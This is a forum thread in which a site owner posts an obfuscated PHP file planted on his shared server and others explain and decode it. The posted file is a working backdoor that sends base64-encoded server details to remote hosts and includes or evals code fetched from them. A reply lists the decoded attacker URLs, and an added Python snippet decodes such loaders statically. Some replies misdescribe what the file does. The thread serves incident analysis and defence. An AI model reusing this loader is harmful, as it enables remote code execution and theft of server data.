bcoffin Posted January 24, 2008

I just noticed that somebody uploaded this file to my server. Any idea what it does?

```php
<?
error_reporting(0);
$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str)));
else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str));
else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str));
?>
```

cooldude832 Posted January 24, 2008

Delete it fast. It's a phishing bot to try and get info on your server. I will type more later.

It's looking for a file (I'm not sure exactly what) and it's basically trying to execute it. Not sure what said file does, but odds are it's something you are trying to protect with chmods and they are trying to execute it. If they succeed (it could be a MySQL connection) they could delete your database or hijack it.

PC Nerd Posted January 24, 2008

Ouch?? BTW, if someone uploaded it to your server, then look at your security etc., maybe change passwords etc., because if it's easy to upload to your server then it could definitely happen again.

bcoffin Posted January 24, 2008

Strange, I'm doing a phpupload there, but ignoring all files with extension ".php" .. I'm not sure how it got in there. There were .htaccess files pointing to that php as an error 404 handler, but not sure how they were able to write .htaccess files either.

resago Posted January 24, 2008

Here is what they are trying to include or execute. The 3rd one sends all that info about your server.

http://a.rsdcraft.ws
http://ad.runweb.info
http://7.xmldata.info/?
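
The decoding resago describes can be done statically, without running the file or contacting any host. The following is an added example, not part of the original thread: the `triage` helper, the sample input and the `example.test` hosts are constructed for illustration, and it only handles the pattern seen in the uploaded file (literal arguments to `base64_decode` feeding `include` or `eval`).

```python
import base64
import re

# base64_decode("literal") or base64_decode('literal')
B64_CALL = re.compile(r'base64_decode\(\s*(["\'])([A-Za-z0-9+/=]+)\1\s*\)')
# PHP constructs that load or run code
LOADER = re.compile(r'\b(include_once|include|require_once|require|eval)\b', re.I)
OPEN, CLOSE = "\x01", "\x02"  # markers placed around decoded text


def b64(text):
    return base64.b64encode(text.encode()).decode()


def _decode(match):
    try:
        raw = base64.b64decode(match.group(2), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return match.group(0)  # leave undecodable literals untouched
    return OPEN + raw.decode("utf-8", errors="replace") + CLOSE


def triage(php_source):
    """Return (loader, url) pairs from static inspection; nothing is run or fetched."""
    text = B64_CALL.sub(_decode, php_source)
    # Join decoded pieces that PHP concatenates with the "." operator
    text = re.sub(CLOSE + r"\s*\.\s*" + OPEN, "", text)
    findings = []
    for m in re.finditer(OPEN + r"(https?://[^\x02]*)" + CLOSE, text):
        # The statement this URL belongs to starts after the previous ';'
        start = text.rfind(";", 0, m.start()) + 1
        loader = LOADER.search(text, start, m.start())
        findings.append((loader.group(1).lower() if loader else None, m.group(1)))
    return findings


# Constructed sample: same shape as the uploaded file, placeholder hosts only
SAMPLE = (
    '<? error_reporting(0); $str = base64_encode($_SERVER["HTTP_HOST"]);\n'
    'if (include(base64_decode("%s").base64_decode("%s")."/?".$str));\n'
    'else eval(file_get_contents(base64_decode("%s").$str)); ?>'
) % (b64("http://"), b64("a.example.test"), b64("http://b.example.test/?"))

if __name__ == "__main__":
    for loader, url in triage(SAMPLE):
        print(f"{loader}: {url}")
```

A file that yields any `include` or `eval` finding with a remote URL is worth quarantining and comparing against the web server's access logs.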

themightydude Posted January 24, 2008

> Strange, I'm doing a phpupload there, but ignoring all files with extension ".php" .. I'm not sure how it got in there. There were .htaccess files pointing to that php as an error 404 handler, but not sure how they were able to write .htaccess files either.

Is this file on your own dedicated server or is this a shared hosting account?

It's possible that access could have been gained through some other script on the server that wasn't locked down. Might check the Apache domlogs for that file name.

bcoffin Posted January 24, 2008

It's on a shared server. I've never met a dedicated server worth a hill of beans .. recommendations much welcome.

How do you recommend that I "lock down" my shared "portion"??

Thanks you guys..